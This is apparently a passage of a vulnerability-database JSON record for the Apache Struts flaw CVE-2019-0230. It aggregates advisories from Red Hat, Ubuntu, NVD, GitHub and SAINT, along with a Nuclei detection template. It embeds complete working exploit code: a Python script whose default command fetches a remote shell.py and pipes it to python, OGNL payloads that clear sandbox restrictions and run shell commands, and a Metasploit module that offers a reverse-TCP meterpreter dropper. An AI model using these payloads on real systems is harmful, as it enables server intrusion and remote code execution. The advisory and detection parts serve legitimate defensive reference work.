"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-04-06T05:37:27", "id": "RH:CVE-2019-0230", "href": "https://access.redhat.com/security/cve/cve-2019-0230", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nuclei": [{"lastseen": "2023-12-07T21:59:07", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T00:00:00", "type": "nuclei", "title": "Apache Struts <=2.5.20 - Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-12-05T00:00:00", "id": "NUCLEI:CVE-2019-0230", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2019/CVE-2019-0230.yaml", "sourceData": "id: CVE-2019-0230\n\ninfo:\n name: Apache Struts <=2.5.20 - Remote Code Execution\n author: geeknik\n severity: critical\n description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.\n remediation: |\n Upgrade Apache Struts to a version higher than 2.5.20 or apply the necessary patches provided by the vendor.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2019-0230\n - https://cwiki.apache.org/confluence/display/WW/S2-059\n - https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability\n - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html\n - https://cwiki.apache.org/confluence/display/ww/s2-059\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2019-0230\n cwe-id: CWE-1321\n epss-score: 0.94961\n epss-percentile: 0.99093\n cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: tenable,packetstorm,struts,rce,cve,cve2019,apache\nvariables:\n str: \"{{rand_base(6)}}\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?id={{str}}%25{128*128}\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"{{str}}16384\"\n\n# digest: 4a0a00473045022100de5fce847d55e9c5483bb908c8735c4b00fdd920f31640dac9072fbcb9643c34022042a10eb84c0d784e19674a06c0ce8de28a6fd50f3dbd6b008e30819e1fe05a39:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-12-06T14:22:57", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated\non raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-14T00:00:00", "type": "ubuntucve", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-09-14T00:00:00", "id": "UB:CVE-2019-0230", "href": "https://ubuntu.com/security/CVE-2019-0230", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2023-11-22T16:52:06", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-27T00:00:00", "type": "saint", "title": "Apache Struts double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-27T00:00:00", "id": "SAINT:1126B0AA9A8BD987E404F1746F1D8BFA", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T16:55:07", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-27T00:00:00", "type": "saint", "title": "Apache Struts double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-27T00:00:00", "id": "SAINT:891A42933A0DE986694E3B7D51B3F2F1", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2023-12-07T17:29:47", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-02T14:50:51", "type": "github", "title": "Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-01-27T05:08:30", "id": "GHSA-WP4H-PVGW-5727", "href": "https://github.com/advisories/GHSA-wp4h-pvgw-5727", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-12-07T14:43:25", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-14T17:15:00", "type": "cve", "title": "CVE-2019-0230", "cwe": ["CWE-1321"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-11-07T03:01:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor:8.0.23", "cpe:/a:oracle:financial_services_data_integration_hub:8.0.6", "cpe:/a:apache:struts:2.5.20", "cpe:/a:oracle:communications_policy_management:12.5.0", "cpe:/a:oracle:financial_services_market_risk_measurement_and_management:8.0.6", "cpe:/a:oracle:financial_services_data_integration_hub:8.0.3"], "id": "CVE-2019-0230", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-0230", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:struts:2.5.20:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:8.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_policy_management:12.5.0:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2023-12-07T16:01:01", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-17T00:00:00", "type": "zdt", "title": "Apache Struts 2.5.20 - Double OGNL evaluation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2020-0230"], "modified": "2020-11-17T00:00:00", "id": "1337DAY-ID-35263", "href": "https://0day.today/exploit/description/35263", "sourceData": "# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation\n# Exploit Author: West Shepherd\n# Vendor Homepage: https://struts.apache.org/download.cgi\n# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)\n# CVE : CVE-2019-0230\n# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.\n# Source(s):\n# https://github.com/PrinceFPF/CVE-2019-0230\n# https://cwiki.apache.org/confluence/display/WW/S2-059\n# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22\n\n# !/usr/bin/python\nfrom sys import argv, exit, stdout, stderr\nimport argparse\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nimport logging\n\n\nclass Exploit:\n def __init__(\n self,\n target='',\n redirect=False,\n proxy_address=''\n ):\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n self.target = target\n self.session = requests.session()\n self.redirect = redirect\n self.timeout = 0.5\n self.proxies = {\n 'http': 'http://%s' % proxy_address,\n 'https': 'http://%s' % proxy_address\n } \\\n if proxy_address is not None \\\n and proxy_address != '' else {}\n self.query_params = {}\n self.form_values = {}\n self.cookies = {}\n boundary = \"---------------------------735323031399963166993862150\"\n self.headers = {\n 'Content-Type': 'multipart/form-data; boundary=%s' % boundary,\n 'Accept': '*/*',\n 'Connection': 'close'\n }\n payload = \"%{(#nike='multipart/form-data').\" \\\n \"(#[email\u00a0protected]@DEFAULT_MEMBER_ACCESS).\" \\\n \"(#_memberAccess?(#_memberAccess=#dm):\" \\\n\n\"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\n\\\n\n\"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\"\n\\\n \"(#ognlUtil.getExcludedPackageNames().clear()).\" \\\n \"(#ognlUtil.getExcludedClasses().clear()).\" \\\n \"(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}').\" \\\n\n\"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).\"\n\\\n\n\"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).\" \\\n \"(#p=new\njava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).\" \\\n\n\"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\"\n\\\n\n\"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).\"\n\\\n \"(#ros.flush())}\"\n\n self.payload = \"--%s\\r\\nContent-Disposition: form-data;\nname=\\\"foo\\\"; \" \\\n \"filename=\\\"%s\\0b\\\"\\r\\nContent-Type:\ntext/plain\\r\\n\\r\\nx\\r\\n--%s--\\r\\n\\r\\n\" % (\n boundary, payload, boundary\n )\n\n def do_get(self, url, params=None, data=None):\n return self.session.get(\n url=url,\n verify=False,\n allow_redirects=self.redirect,\n headers=self.headers,\n cookies=self.cookies,\n proxies=self.proxies,\n data=data,\n params=params\n )\n\n def do_post(self, url, data=None, params=None):\n return self.session.post(\n url=url,\n data=data,\n verify=False,\n allow_redirects=self.redirect,\n headers=self.headers,\n cookies=self.cookies,\n proxies=self.proxies,\n params=params\n )\n\n def debug(self):\n try:\n import http.client as http_client\n except ImportError:\n import httplib as http_client\n http_client.HTTPConnection.debuglevel = 1\n logging.basicConfig()\n logging.getLogger().setLevel(logging.DEBUG)\n requests_log = logging.getLogger(\"requests.packages.urllib3\")\n requests_log.setLevel(logging.DEBUG)\n requests_log.propagate = True\n return self\n\n def send_payload(self, command='curl --insecure -sv\nhttps://10.10.10.10/shell.py|python -'):\n url = self.target\n stdout.write('sending payload to %s payload %s' % (url, command))\n resp = self.do_post(url=url, params=self.query_params,\ndata=self.payload.replace('{COMMAND}', command))\n return resp\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(add_help=True,\n description='CVE-2020-0230 Struts\n2 exploit')\n try:\n parser.add_argument('-target', action='store', help='Target\naddress: http(s)://target.com/index.action')\n parser.add_argument('-command', action='store',\n help='Command to execute: touch /tmp/pwn')\n parser.add_argument('-debug', action='store', default=False,\nhelp='Enable debugging: False')\n parser.add_argument('-proxy', action='store', default='',\nhelp='Enable proxy: 10.10.10.10:8080')\n\n if len(argv) == 1:\n parser.print_help()\n exit(1)\n options = parser.parse_args()\n\n exp = Exploit(\n proxy_address=options.proxy,\n target=options.target\n )\n\n if options.debug:\n exp.debug()\n stdout.write('target %s debug %s proxy %s\\n' % (\n options.target, options.debug, options.proxy\n ))\n\n result = exp.send_payload(command=options.command)\n stdout.write('Response: %d\\n' % result.status_code)\n\n except Exception as error:\n\nstderr.write('error in main %s' % str(error))\n", "sourceHref": "https://0day.today/exploit/35263", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T16:00:17", "description": "The Apache Struts framework, when forced, performs double evaluation of attribute values assigned to certain tags attributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a tag's attributes are rendered. With a carefully crafted request, this can lead to remote code execution. This vulnerability is application dependant. A server side template must make an affected use of request data to render an HTML tag attribute.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-24T00:00:00", "type": "zdt", "title": "Apache Struts 2 Forced Multi OGNL Evaluation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2020-12-24T00:00:00", "id": "1337DAY-ID-35571", "href": "https://0day.today/exploit/description/35571", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache Struts 2 Forced Multi OGNL Evaluation',\n 'Description' => %q{\n The Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags\n attributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a\n tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).\n\n This vulnerability is application dependant. A server side template must make an affected use of request data to\n render an HTML tag attribute.\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Matthias Kaiser', # discovery of CVE-2019-0230\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2020-17530\n 'ka1n4t', # PoC of CVE-2020-17530\n ],\n 'References' => [\n ['CVE', '2019-0230'],\n ['CVE', '2020-17530'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-059'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-061'],\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-059'],\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-061'],\n ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2'],\n ['URL', 'https://github.com/ka1n4t/CVE-2020-17530'],\n ],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE, ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ]\n },\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\n OptString.new('NAME', [ true, 'The HTTP query parameter or form data name', 'id']),\n OptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-17530', ['CVE-2020-17530', 'CVE-2019-0230']])\n ])\n register_advanced_options([\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\n OptString.new('HttpCookie', [false, 'An optional cookie to include when making the HTTP request'])\n ])\n end\n\n def check\n num1 = rand(1000..9999)\n num2 = rand(1000..9999)\n\n res = send_request_cgi(build_http_request(datastore['CVE'], \"#{num1}*#{num2}\"))\n if res.nil?\n return CheckCode::Unknown\n elsif res.body.scan(/([\"'])\\s*#{(num1 * num2)}\\s*\\1/).empty?\n return CheckCode::Safe\n end\n\n return CheckCode::Appears\n end\n\n def exploit\n cve = datastore['CVE']\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']} using #{cve}\")\n\n if cve == 'CVE-2019-0230'\n ognl = []\n ognl << '#context=#attr[\\'struts.valueStack\\'].context'\n ognl << '#container=#context[\\'com.opensymphony.xwork2.ActionContext.container\\']'\n ognl << '#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)'\n ognl << '#ognlUtil.setExcludedClasses(\\'\\')'\n ognl << '#ognlUtil.setExcludedPackageNames(\\'\\')'\n res = send_request_cgi(build_http_request(cve, ognl))\n fail_with(Failure::UnexpectedReply, 'Failed to execute the OGNL preamble') unless res&.code == 200\n end\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded, { cve: cve })\n when :linux_dropper\n execute_cmdstager({ cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 512 })\n end\n end\n\n def execute_command(cmd, opts = {})\n send_request_cgi(build_http_request(opts[:cve], build_ognl(opts[:cve], cmd)), 5)\n end\n\n def build_http_request(cve, ognl)\n ognl = ognl.map { |part| \"(#{part})\" }.join('.') if ognl.is_a? Array\n\n http_request_parameters = { 'uri' => normalize_uri(target_uri.path) }\n http_request_parameters['cookie'] = datastore['HttpCookie'] unless datastore['HttpCookie'].blank?\n if cve == 'CVE-2019-0230'\n http_request_parameters['method'] = 'GET'\n http_request_parameters['vars_get'] = { datastore['NAME'] => \"%{#{ognl}}\" }\n elsif cve == 'CVE-2020-17530'\n http_request_parameters['method'] = 'POST'\n http_request_parameters['vars_post'] = { datastore['NAME'] => \"%{#{ognl}}\" }\n end\n http_request_parameters\n end\n\n def build_ognl(cve, cmd)\n cmd = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\"\n ognl = []\n if cve == 'CVE-2019-0230'\n ognl << '#context=#attr[\\'struts.valueStack\\'].context'\n ognl << '#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)'\n ognl << \"@java.lang.Runtime@getRuntime().exec(\\\"#{cmd}\\\")\"\n elsif cve == 'CVE-2020-17530'\n ognl << '#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]'\n ognl << '#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]'\n ognl << '#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")'\n ognl << '#bean.setBean(#stack)'\n ognl << '#context=#bean.get(\"context\")'\n ognl << '#bean.setBean(#context)'\n ognl << '#macc=#bean.get(\"memberAccess\")'\n ognl << '#bean.setBean(#macc)'\n ognl << '#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")'\n ognl << '#bean.put(\"excludedClasses\",#emptyset)'\n ognl << '#bean.put(\"excludedPackageNames\",#emptyset)'\n ognl << '#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")'\n ognl << \"#execute.exec({\\\"#{cmd}\\\"})\"\n end\n\n ognl\n end\nend\n", "sourceHref": "https://0day.today/exploit/35571", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-12-24T21:49:19", "description": "", "cvss3": {}, "published": "2020-12-24T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 Forced Multi OGNL Evaluation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2020-12-24T00:00:00", "id": "PACKETSTORM:160721", "href": "https://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Apache Struts 2 Forced Multi OGNL Evaluation', \n'Description' => %q{ \nThe Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags \nattributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a \ntag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). \n \nThis vulnerability is application dependant. A server side template must make an affected use of request data to \nrender an HTML tag attribute. \n}, \n'Author' => [ \n'Spencer McIntyre', # Metasploit module \n'Matthias Kaiser', # discovery of CVE-2019-0230 \n'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2020-17530 \n'ka1n4t', # PoC of CVE-2020-17530 \n], \n'References' => [ \n['CVE', '2019-0230'], 